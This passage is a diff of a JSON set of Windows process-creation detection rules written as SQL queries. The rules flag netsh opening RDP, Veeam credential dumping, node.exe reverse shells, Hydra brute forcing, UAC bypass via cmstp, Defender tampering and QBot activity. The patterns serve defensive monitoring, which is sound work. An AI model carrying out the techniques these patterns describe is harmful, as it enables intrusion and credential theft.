'\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": 
"01aeb693-138d-49d2-9403-c4f52d7d3d62", - "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "title": "Write Protect For Storage Disabled", + "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "status": "experimental", + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "author": "Sreeman", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\' AND (CommandLine LIKE '%storage%' ESCAPE '\\' OR CommandLine LIKE '%storagedevicepolicies%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_reg_write_protect_for_storage_disabled.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", - "status": "stable", - 
"description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "title": "Application Whitelisting Bypass via Dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "test", + "description": "Detects execution of of Dxcap.exe", + "author": "Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Legitimate execution of dxcap.exe by legitimate user" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%-noni -ep bypass $%' ESCAPE '\\' OR (CommandLine LIKE '%cyzfc.dat,%' ESCAPE '\\' AND CommandLine LIKE '%PointFunctionCall%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\DXCap.exe' ESCAPE '\\' OR OriginalFileName = 'DXCap.exe') AND CommandLine LIKE '% -c %' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt29_phishing_campaign_indicators.yml" + "filename": "proc_creation_win_lolbin_susp_dxcap.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation", - "id": "4bf943c6-5146-4273-98dd-e958fd1e3abf", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", "status": "test", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.t1027", - "attack.execution", + 
"attack.defense_evasion", + "attack.t1140", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR CommandLine REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR CommandLine REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR CommandLine REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR CommandLine REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR CommandLine REGEXP '\\$VerbosePreference\\.ToString\\(' OR CommandLine REGEXP '\\[String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Renamed AutoHotkey.EXE Execution", - "id": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", - "author": "Nasreddine Bencherchali", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product LIKE '%AutoHotkey%' ESCAPE '\\' OR Description LIKE '%AutoHotkey%' ESCAPE '\\' OR OriginalFileName IN ('AutoHotkey.exe', 'AutoHotkey.rc')) AND NOT ((NewProcessName LIKE '%\\\\AutoHotkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkey64\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyA32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU32\\_UIA.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AutoHotkeyU64\\_UIA.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\AutoHotkey%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_autohotkey.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "Suspicious PowerShell Invocation From Script Engines", - "id": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "status": "test", - 
"description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by QBot", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.005" ], "falsepositives": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\Health Service State\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_script_engine_parent.yml" + "filename": "proc_creation_win_malware_qbot.yml" }, { - "title": "PDQ Deploy Remote Adminstartion Tool Execution", - "id": "d679950c-abb7-43a6-80fb-2a480c4fc450", - "status": "experimental", - "description": "Detect use of PDQ Deploy remote admin tool", - "author": "frack113", + "title": "Malicious Windows Script Components File Execution by TAEF Detection", + "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "status": "test", + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by 
executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "author": "Agro (@agro_sev) oscd.community", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.t1218" ], "falsepositives": [ - "Legitimate use" + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PDQ Deploy Console' OR Product = 'PDQ Deploy' OR Company = 'PDQ.com' OR OriginalFileName = 'PDQDeployConsole.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\te.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\te.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pdqdeploy_execution.yml" + "filename": "proc_creation_win_susp_use_of_te_bin.yml" }, { - "title": "Boot Configuration Tampering Via Bcdedit.EXE", - "id": "1444443e-6757-43e4-9ea4-c8fc705f79a2", - "status": "stable", - "description": "Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware.", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Terminal Service Process Spawn", + "id": "1012f107-b8f1-4271-af30-5aed2de89b39", + "status": "test", + "description": "Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.initial_access", + "attack.t1190", + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR OriginalFileName = 'bcdedit.exe') AND CommandLine LIKE '%set%' ESCAPE '\\' AND ((CommandLine LIKE '%bootstatuspolicy%' ESCAPE '\\' AND CommandLine LIKE '%ignoreallfailures%' ESCAPE '\\') OR (CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\svchost.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%termsvcs%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\rdpclip.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\csrss.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\wininit.exe' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\')) OR (NewProcessName = '')))" ], - "filename": "proc_creation_win_bcdedit_boot_conf_tamper.yml" + "filename": "proc_creation_win_svchost_termserv_proc_spawn.yml" }, { - "title": "Suspicious Execution of Shutdown to Log Out", - "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", + "title": "Use NTFS Short Name in Image", + "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", "status": "experimental", - "description": "Detects the rare use of the command line tool shutdown to logoff a user", 
- "author": "frack113", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1529" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_shutdown_logoff.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" }, { - "title": "Droppers Exploiting CVE-2017-11882", - "id": 
"678eb5f4-8597-4be6-8be7-905e4234b53a", - "status": "stable", - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious UltraVNC Execution", + "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "status": "test", + "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.lateral_movement", + "attack.g0047", + "attack.t1021.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2017_11882.yml" + "filename": "proc_creation_win_ultravnc_susp_execution.yml" }, { - "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", - "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "status": "test", - "description": "Detects dump of credentials in VeeamBackup dbo", - "author": "frack113", + "title": "HackTool - Htran/NATBypass Execution", + "id": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", + "status": "experimental", + "description": "Detects exeuctable names or flags used by Htran or Htran-like tools (e.g. 
NATBypass)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.command_and_control", + "attack.t1090", + "attack.s0040" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\htran.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\lcx.exe' ESCAPE '\\') OR (CommandLine LIKE '%.exe -tran %' ESCAPE '\\' OR CommandLine LIKE '%.exe -slave %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" + "filename": "proc_creation_win_hktl_htran_or_natbypass.yml" }, { - "title": "Node Process Executions", - "id": "df1f26d3-bea7-4700-9ea2-ad3e990cf90e", - "status": "experimental", - "description": "Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud", - "author": "Max Altgelt (Nextron Systems)", + "title": "Using SettingSyncHost.exe as LOLBin", + "id": "b2ddd389-f676-4ac4-845a-e00781a48e5f", + "status": "test", + "description": "Detects using SettingSyncHost.exe to run hijacked binary", + "author": "Anton Kutepov, oscd.community", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1127", - "attack.t1059.007" + "attack.t1574.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\Adobe Creative Cloud Experience\\\\libs\\\\node.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%Adobe Creative Cloud Experience\\\\js%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT 
((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) AND (ParentCommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' AND ParentCommandLine LIKE '%RoamDiag.cmd%' ESCAPE '\\' AND ParentCommandLine LIKE '%-outputpath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_adobe_creative_cloud_abuse.yml" + "filename": "proc_creation_win_lolbin_settingsynchost.yml" }, { - "title": "Use of Remote.exe", - "id": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "title": "Suspicious CMD Shell Output Redirect", + "id": "8e0bb260-d4b2-4fff-bb8d-3f82118e6892", "status": "experimental", - "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects inline windows shell commands redirecting output via the \">\" symbol to a suspicious location", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
+ "Legitimate admin scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\remote.exe' ESCAPE '\\' OR OriginalFileName = 'remote.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ((CommandLine LIKE '%> \\%USERPROFILE\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%APPDATA\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TEMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> \\%TMP\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%> C:\\\\Temp\\\\%' ESCAPE '\\') OR ((CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% >> %' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_remote.yml" + "filename": "proc_creation_win_cmd_redirection_susp_folder.yml" }, { - "title": "Windows Hotfix Updates Reconnaissance Via Wmic.EXE", - "id": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "title": "CL_LoadAssembly.ps1 Proxy Execution", + "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", "status": "experimental", - "description": "Detects the execution of wmic with the \"qfe\" flag in order to obtain information about installed hotfix updates on the system. 
This is often used by pentester and attacker enumeration scripts", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND CommandLine LIKE '% qfe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_hotfix.yml" + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" }, { - "title": "Using AppVLP To Circumvent ASR File Path Rule", - "id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", + "title": "DumpMinitool Execution", + "id": "dee0a7a3-f200-4112-a99b-952196d81e42", "status": "experimental", - "description": "Application Virtualization Utility is included with Microsoft Office. 
We are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder\nor to mark a file as a system file.\n", - "author": "Sreeman", + "description": "Detects the use of \"DumpMinitool.exe\" a tool that allows the dump of process memory via the use of the \"MiniDumpWriteDump\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.t1218", "attack.defense_evasion", - "attack.execution" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\appvlp.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\msoasb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND (CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_appvlp.yml" + "filename": "proc_creation_win_dumpminitool_execution.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference", - "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", - "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Command Line Execution with Suspicious URL and AppData Strings", + "id": "1ac8666b-046f-4201-8aba-1951aaec03a3", + "status": "test", + 
"description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.command_and_control", + "attack.t1059.003", + "attack.t1059.001", + "attack.t1105" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "High" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\' AND CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" + "filename": "proc_creation_win_cmd_http_appdata.yml" }, { - "title": "Potential Arbitrary Code Execution Via Node.EXE", - "id": "6640f31c-01ad-49b5-beb5-83498a5cd8bd", - "status": "experimental", - "description": "Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. 
For example to establish reverse shell as seen in Log4j attacks...etc", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Hydra Password Bruteforce Execution", + "id": "aaafa146-074c-11eb-adc1-0242ac120002", + "status": "test", + "description": "Detects command line parameters used by Hydra password guessing hack tool", + "author": "Vasiliy Burov", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.credential_access", + "attack.t1110", + "attack.t1110.001" ], "falsepositives": [ - "Unlikely" + "Software that uses the caret encased keywords PASS and USER in its command line" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\node.exe' ESCAPE '\\' AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% --eval %' ESCAPE '\\') AND CommandLine LIKE '%.exec(%' ESCAPE '\\' AND CommandLine LIKE '%net.socket%' ESCAPE '\\' AND CommandLine LIKE '%.connect%' ESCAPE '\\' AND CommandLine LIKE '%child\\_process%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-u %' ESCAPE '\\' AND CommandLine LIKE '%-p %' ESCAPE '\\' AND (CommandLine LIKE '%^USER^%' ESCAPE '\\' OR CommandLine LIKE '%^PASS^%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_node_abuse.yml" + "filename": "proc_creation_win_hktl_hydra.yml" }, { - "title": "Malicious Windows Script Components File Execution by TAEF Detection", - "id": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "title": "Taskmgr as Parent", + "id": "3d7679bd-0c00-440c-97b0-3f204273e6c7", "status": "test", - "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so 